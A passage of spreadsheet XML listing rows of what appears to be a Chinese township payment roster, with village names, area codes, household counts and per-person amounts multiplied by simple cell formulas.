    <row r="445" customHeight="1" spans="1:11">
      <c r="A445" s="23" t="s">
        <v>1295</v>
      </c>
      <c r="B445" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C445" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D445" s="24" t="s">
        <v>1296</v>
      </c>
      <c r="E445" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F445" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G445" s="24">
        <v>1</v>
      </c>
      <c r="H445" s="25">
        <v>365</v>
      </c>
      <c r="I445" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J445" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K445" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="446" customHeight="1" spans="1:11">
      <c r="A446" s="23" t="s">
        <v>1297</v>
      </c>
      <c r="B446" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C446" s="24" t="s">
        <v>1298</v>
      </c>
      <c r="D446" s="24" t="s">
        <v>1299</v>
      </c>
      <c r="E446" s="24" t="s">
        <v>370</v>
      </c>
      <c r="F446" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G446" s="24">
        <v>2</v>
      </c>
      <c r="H446" s="25">
        <v>325</v>
      </c>
      <c r="I446" s="24">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J446" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K446" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="447" customHeight="1" spans="1:11">
      <c r="A447" s="23" t="s">
        <v>1300</v>
      </c>
      <c r="B447" s="24" t="str">
        <f>B446</f>
        <v>城关镇</v>
      </c>
      <c r="C447" s="24" t="str">
        <f>C446</f>
        <v>城关北外村</v>
      </c>
      <c r="D447" s="23" t="s">
        <v>1301</v>
      </c>
      <c r="E447" s="23" t="s">
        <v>1302</v>
      </c>
      <c r="F447" s="24" t="str">
        <f>F446</f>
        <v>4113210102</v>
      </c>
      <c r="G447" s="24"/>
      <c r="H447" s="24"/>
      <c r="I447" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J447" s="24"/>
      <c r="K447" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="448" customHeight="1" spans="1:11">
      <c r="A448" s="23" t="s">
        <v>1303</v>
      </c>
      <c r="B448" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C448" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D448" s="24" t="s">
        <v>1304</v>
      </c>
      <c r="E448" s="24" t="s">
        <v>242</v>
      </c>
      <c r="F448" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G448" s="24">
        <v>2</v>
      </c>
      <c r="H448" s="25">
        <v>325</v>
      </c>
      <c r="I448" s="24">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J448" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K448" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="449" customHeight="1" spans="1:11">
      <c r="A449" s="23" t="s">
        <v>1305</v>
      </c>
      <c r="B449" s="24" t="str">
        <f>B448</f>
        <v>城关镇</v>
      </c>
      <c r="C449" s="24" t="str">
        <f>C448</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D449" s="23" t="s">
        <v>1306</v>
      </c>
      <c r="E449" s="23" t="s">
        <v>1307</v>
      </c>
      <c r="F449" s="24" t="str">
        <f>F448</f>
        <v>4113210108</v>
      </c>
      <c r="G449" s="24"/>
      <c r="H449" s="24"/>
      <c r="I449" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J449" s="24"/>
      <c r="K449" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="450" customHeight="1" spans="1:11">
      <c r="A450" s="23" t="s">
        <v>1308</v>
      </c>
      <c r="B450" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C450" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D450" s="24" t="s">
        <v>1309</v>
      </c>
      <c r="E450" s="24" t="s">
        <v>360</v>
      </c>
      <c r="F450" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G450" s="24">
        <v>1</v>
      </c>
      <c r="H450" s="25">
        <v>365</v>
      </c>
      <c r="I450" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J450" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K450" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="451" customHeight="1" spans="1:11">
      <c r="A451" s="23" t="s">
        <v>1310</v>
      </c>
      <c r="B451" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C451" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D451" s="24" t="s">
        <v>1311</v>
      </c>
      <c r="E451" s="24" t="s">
        <v>1312</v>
      </c>
      <c r="F451" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G451" s="24">
        <v>1</v>
      </c>
      <c r="H451" s="25">
        <v>365</v>
      </c>
      <c r="I451" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J451" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K451" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="452" customHeight="1" spans="1:11">
      <c r="A452" s="23" t="s">
        <v>1313</v>
      </c>
      <c r="B452" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C452" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D452" s="24" t="s">
        <v>1314</v>
      </c>
      <c r="E452" s="24" t="s">
        <v>1315</v>
      </c>
      <c r="F452" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G452" s="24">
        <v>1</v>
      </c>
      <c r="H452" s="25">
        <v>365</v>
      </c>
      <c r="I452" s="24">
        <f t="shared" ref="I452:I515" si="7">H452*G452</f>
        <v>365</v>
      </c>
      <c r="J452" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K452" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="453" customHeight="1" spans="1:11">
      <c r="A453" s="23" t="s">
        <v>1316</v>
      </c>
      <c r="B453" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C453" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D453" s="24" t="s">
        <v>1317</v>
      </c>
      <c r="E453" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F453" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G453" s="24">
        <v>1</v>
      </c>
      <c r="H453" s="25">
        <v>365</v>
      </c>
      <c r="I453" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J453" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K453" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="454" customHeight="1" spans="1:11">
      <c r="A454" s="23" t="s">
        <v>1318</v>
      </c>
      <c r="B454" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C454" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D454" s="24" t="s">
        <v>1319</v>
      </c>
      <c r="E454" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F454" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G454" s="24">
        <v>1</v>
      </c>
      <c r="H454" s="25">
        <v>365</v>
      </c>
      <c r="I454" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J454" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K454" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="455" customHeight="1" spans="1:11">
      <c r="A455" s="23" t="s">
        <v>1320</v>
      </c>
      <c r="B455" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C455" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D455" s="24" t="s">
        <v>1321</v>
      </c>
      <c r="E455" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F455" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G455" s="24">
        <v>1</v>
      </c>
      <c r="H455" s="25">
        <v>365</v>
      </c>
      <c r="I455" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J455" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K455" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="456" customHeight="1" spans="1:11">
      <c r="A456" s="23" t="s">
        <v>1322</v>
      </c>
      <c r="B456" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C456" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D456" s="24" t="s">
        <v>1323</v>
      </c>
      <c r="E456" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F456" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G456" s="24">
        <v>1</v>
      </c>
      <c r="H456" s="25">
        <v>365</v>
      </c>
      <c r="I456" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J456" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K456" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="457" customHeight="1" spans="1:11">
      <c r="A457" s="23" t="s">
        <v>1324</v>
      </c>
      <c r="B457" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C457" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D457" s="24" t="s">
        <v>1325</v>
      </c>
      <c r="E457" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F457" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G457" s="24">
        <v>1</v>
      </c>
      <c r="H457" s="25">
        <v>365</v>
      </c>
      <c r="I457" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J457" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K457" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="458" customHeight="1" spans="1:11">
      <c r="A458" s="23" t="s">
        <v>1326</v>
      </c>
      <c r="B458" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C458" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D458" s="24" t="s">
        <v>1327</v>
      </c>
      <c r="E458" s="24" t="s">
        <v>1328</v>
      </c>
      <c r="F458" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G458" s="24">
        <v>2</v>
      </c>
      <c r="H458" s="25">
        <v>325</v>
      </c>
      <c r="I458" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J458" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K458" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="459" customHeight="1" spans="1:11">
      <c r="A459" s="23" t="s">
        <v>1329</v>
      </c>
      <c r="B459" s="24" t="str">
        <f>B458</f>
        <v>城关镇</v>
      </c>
      <c r="C459" s="24" t="str">
        <f>C458</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D459" s="23" t="s">
        <v>1330</v>
      </c>
      <c r="E459" s="23" t="s">
        <v>288</v>
      </c>
      <c r="F459" s="24" t="str">
        <f>F458</f>
        <v>4113210108</v>
      </c>
      <c r="G459" s="24"/>
      <c r="H459" s="24"/>
      <c r="I459" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J459" s="24"/>
      <c r="K459" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="460" customHeight="1" spans="1:11">
      <c r="A460" s="23" t="s">
        <v>1331</v>
      </c>
      <c r="B460" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C460" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D460" s="24" t="s">
        <v>1332</v>
      </c>
      <c r="E460" s="24" t="s">
        <v>1333</v>
      </c>
      <c r="F460" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G460" s="24">
        <v>1</v>
      </c>
      <c r="H460" s="25">
        <v>365</v>
      </c>
      <c r="I460" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J460" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K460" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="461" customHeight="1" spans="1:11">
      <c r="A461" s="23" t="s">
        <v>1334</v>
      </c>
      <c r="B461" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C461" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D461" s="24" t="s">
        <v>1335</v>
      </c>
      <c r="E461" s="24" t="s">
        <v>1228</v>
      </c>
      <c r="F461" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G461" s="24">
        <v>1</v>
      </c>
      <c r="H461" s="25">
        <v>365</v>
      </c>
      <c r="I461" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J461" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K461" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="462" customHeight="1" spans="1:11">
      <c r="A462" s="23" t="s">
        <v>1336</v>
      </c>
      <c r="B462" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C462" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D462" s="24" t="s">
        <v>1337</v>
      </c>
      <c r="E462" s="24" t="s">
        <v>1338</v>
      </c>
      <c r="F462" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G462" s="24">
        <v>1</v>
      </c>
      <c r="H462" s="25">
        <v>365</v>
      </c>
      <c r="I462" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J462" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K462" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="463" customHeight="1" spans="1:11">
      <c r="A463" s="23" t="s">
        <v>1339</v>
      </c>
      <c r="B463" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C463" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D463" s="24" t="s">
        <v>1340</v>
      </c>
      <c r="E463" s="24" t="s">
        <v>1341</v>
      </c>
      <c r="F463" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G463" s="24">
        <v>1</v>
      </c>
      <c r="H463" s="25">
        <v>365</v>
      </c>
      <c r="I463" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J463" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K463" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="464" customHeight="1" spans="1:11">
      <c r="A464" s="23" t="s">
        <v>1342</v>
      </c>
      <c r="B464" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C464" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D464" s="24" t="s">
        <v>1343</v>
      </c>
      <c r="E464" s="24" t="s">
        <v>295</v>
      </c>
      <c r="F464" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G464" s="24">
        <v>1</v>
      </c>
      <c r="H464" s="25">
        <v>365</v>
      </c>
      <c r="I464" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J464" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K464" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="465" customHeight="1" spans="1:11">
      <c r="A465" s="23" t="s">
        <v>1344</v>
      </c>
      <c r="B465" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C465" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D465" s="24" t="s">
        <v>1346</v>
      </c>
      <c r="E465" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F465" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G465" s="24">
        <v>1</v>
      </c>
      <c r="H465" s="25">
        <v>365</v>
      </c>
      <c r="I465" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J465" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K465" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="466" customHeight="1" spans="1:11">
      <c r="A466" s="23" t="s">
        <v>1347</v>
      </c>
      <c r="B466" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C466" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D466" s="24" t="s">
        <v>1348</v>
      </c>
      <c r="E466" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F466" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G466" s="24">
        <v>1</v>
      </c>
      <c r="H466" s="25">
        <v>365</v>
      </c>
      <c r="I466" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J466" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K466" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="467" customHeight="1" spans="1:11">
      <c r="A467" s="23" t="s">
        <v>1349</v>
      </c>
      <c r="B467" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C467" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D467" s="24" t="s">
        <v>1350</v>
      </c>
      <c r="E467" s="24" t="s">
        <v>1351</v>
      </c>
      <c r="F467" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G467" s="24">
        <v>1</v>
      </c>
      <c r="H467" s="25">
        <v>365</v>
      </c>
      <c r="I467" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J467" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K467" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="468" customHeight="1" spans="1:11">
      <c r="A468" s="23" t="s">
        <v>1352</v>
      </c>
      <c r="B468" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C468" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D468" s="24" t="s">
        <v>1353</v>
      </c>
      <c r="E468" s="24" t="s">
        <v>389</v>
      </c>
      <c r="F468" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G468" s="24">
        <v>1</v>
      </c>
      <c r="H468" s="25">
        <v>365</v>
      </c>
      <c r="I468" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J468" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K468" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="469" customHeight="1" spans="1:11">
      <c r="A469" s="23" t="s">
        <v>1354</v>
      </c>
      <c r="B469" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C469" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D469" s="24" t="s">
        <v>1355</v>
      </c>
      <c r="E469" s="24" t="s">
        <v>370</v>
      </c>
      <c r="F469" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G469" s="24">
        <v>1</v>
      </c>
      <c r="H469" s="25">
        <v>365</v>
      </c>
      <c r="I469" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J469" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K469" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="470" customHeight="1" spans="1:11">
      <c r="A470" s="23" t="s">
        <v>1356</v>
      </c>
      <c r="B470" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C470" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D470" s="24" t="s">
        <v>1357</v>
      </c>
      <c r="E470" s="24" t="s">
        <v>1358</v>
      </c>
      <c r="F470" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G470" s="24">
        <v>1</v>
      </c>
      <c r="H470" s="25">
        <v>365</v>
      </c>
      <c r="I470" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J470" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K470" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="471" customHeight="1" spans="1:11">
      <c r="A471" s="23" t="s">
        <v>1359</v>
      </c>
      <c r="B471" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C471" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D471" s="24" t="s">
        <v>1360</v>
      </c>
      <c r="E471" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F471" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G471" s="24">
        <v>1</v>
      </c>
      <c r="H471" s="25">
        <v>365</v>
      </c>
      <c r="I471" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J471" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K471" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="472" customHeight="1" spans="1:11">
      <c r="A472" s="23" t="s">
        <v>1361</v>
      </c>
      <c r="B472" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C472" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D472" s="24" t="s">
        <v>1362</v>
      </c>
      <c r="E472" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F472" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G472" s="24">
        <v>1</v>
      </c>
      <c r="H472" s="25">
        <v>365</v>
      </c>
      <c r="I472" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J472" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K472" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="473" customHeight="1" spans="1:11">
      <c r="A473" s="23" t="s">
        <v>1363</v>
      </c>
      <c r="B473" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C473" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D473" s="24" t="s">
        <v>1364</v>
      </c>
      <c r="E473" s="24" t="s">
        <v>252</v>
      </c>
      <c r="F473" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G473" s="24">
        <v>1</v>
      </c>
      <c r="H473" s="25">
        <v>365</v>
      </c>
      <c r="I473" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J473" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K473" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="474" customHeight="1" spans="1:11">
      <c r="A474" s="23" t="s">
        <v>1365</v>
      </c>
      <c r="B474" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C474" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D474" s="24" t="s">
        <v>1366</v>
      </c>
      <c r="E474" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F474" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G474" s="24">
        <v>1</v>
      </c>
      <c r="H474" s="25">
        <v>365</v>
      </c>
      <c r="I474" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J474" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K474" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="475" customHeight="1" spans="1:11">
      <c r="A475" s="23" t="s">
        <v>1367</v>
      </c>
      <c r="B475" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C475" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D475" s="24" t="s">
        <v>1368</v>
      </c>
      <c r="E475" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F475" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G475" s="24">
        <v>2</v>
      </c>
      <c r="H475" s="25">
        <v>325</v>
      </c>
      <c r="I475" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J475" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K475" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="476" customHeight="1" spans="1:11">
      <c r="A476" s="23" t="s">
        <v>1369</v>
      </c>
      <c r="B476" s="24" t="str">
        <f>B475</f>
        <v>城关镇</v>
      </c>
      <c r="C476" s="24" t="str">
        <f>C475</f>
        <v>东北村</v>
      </c>
      <c r="D476" s="23" t="s">
        <v>1370</v>
      </c>
      <c r="E476" s="23" t="s">
        <v>295</v>
      </c>
      <c r="F476" s="24" t="str">
        <f>F475</f>
        <v>4113210103</v>
      </c>
      <c r="G476" s="24"/>
      <c r="H476" s="24"/>
      <c r="I476" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J476" s="24"/>
      <c r="K476" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="477" customHeight="1" spans="1:11">
      <c r="A477" s="23" t="s">
        <v>1371</v>
      </c>
      <c r="B477" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C477" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D477" s="24" t="s">
        <v>1372</v>
      </c>
      <c r="E477" s="24" t="s">
        <v>552</v>
      </c>
      <c r="F477" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G477" s="24">
        <v>1</v>
      </c>
      <c r="H477" s="25">
        <v>365</v>
      </c>
      <c r="I477" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J477" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K477" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="478" customHeight="1" spans="1:11">
      <c r="A478" s="23" t="s">
        <v>1373</v>
      </c>
      <c r="B478" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C478" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D478" s="24" t="s">
        <v>1374</v>
      </c>
      <c r="E478" s="24" t="s">
        <v>435</v>
      </c>
      <c r="F478" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G478" s="24">
        <v>2</v>
      </c>
      <c r="H478" s="25">
        <v>325</v>
      </c>
      <c r="I478" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J478" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K478" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="479" customHeight="1" spans="1:11">
      <c r="A479" s="23" t="s">
        <v>1375</v>
      </c>
      <c r="B479" s="24" t="str">
        <f>B478</f>
        <v>城关镇</v>
      </c>
      <c r="C479" s="24" t="str">
        <f>C478</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D479" s="23" t="s">
        <v>1376</v>
      </c>
      <c r="E479" s="23" t="s">
        <v>432</v>
      </c>
      <c r="F479" s="24" t="str">
        <f>F478</f>
        <v>4113210106</v>
      </c>
      <c r="G479" s="24"/>
      <c r="H479" s="24"/>
      <c r="I479" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J479" s="24"/>
      <c r="K479" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="480" customHeight="1" spans="1:11">
      <c r="A480" s="23" t="s">
        <v>1377</v>
      </c>
      <c r="B480" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C480" s="24" t="s">
        <v>219</v>
      </c>
      <c r="D480" s="24" t="s">
        <v>1378</v>
      </c>
      <c r="E480" s="24" t="s">
        <v>1379</v>
      </c>
      <c r="F480" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G480" s="24">
        <v>1</v>
      </c>
      <c r="H480" s="25">
        <v>365</v>
      </c>
      <c r="I480" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J480" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K480" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="481" customHeight="1" spans="1:11">
      <c r="A481" s="23" t="s">
        <v>1380</v>
      </c>
      <c r="B481" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C481" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D481" s="24" t="s">
        <v>1381</v>
      </c>
      <c r="E481" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F481" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G481" s="24">
        <v>1</v>
      </c>
      <c r="H481" s="25">
        <v>365</v>
      </c>
      <c r="I481" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J481" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K481" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="482" customHeight="1" spans="1:11">
      <c r="A482" s="23" t="s">
        <v>1382</v>
      </c>
      <c r="B482" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C482" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D482" s="24" t="s">
        <v>1383</v>
      </c>
      <c r="E482" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F482" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G482" s="24">
        <v>1</v>
      </c>
      <c r="H482" s="25">
        <v>365</v>
      </c>
      <c r="I482" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J482" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K482" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="483" customHeight="1" spans="1:11">
      <c r="A483" s="23" t="s">
        <v>1384</v>
      </c>
      <c r="B483" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C483" s="24" t="s">
        <v>219</v>
      </c>
      <c r="D483" s="24" t="s">
        <v>1385</v>
      </c>
      <c r="E483" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F483" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G483" s="24">
        <v>1</v>
      </c>
      <c r="H483" s="25">
        <v>365</v>
      </c>
      <c r="I483" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J483" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K483" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="484" customHeight="1" spans="1:11">
      <c r="A484" s="23" t="s">
        <v>1386</v>
      </c>
      <c r="B484" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C484" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D484" s="24" t="s">
        <v>1387</v>
      </c>
      <c r="E484" s="24" t="s">
        <v>980</v>
      </c>
      <c r="F484" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G484" s="24">
        <v>2</v>
      </c>
      <c r="H484" s="25">
        <v>325</v>
      </c>
      <c r="I484" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J484" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K484" s="24" t="s">
        <v>225</v>
      </c>
    </row>
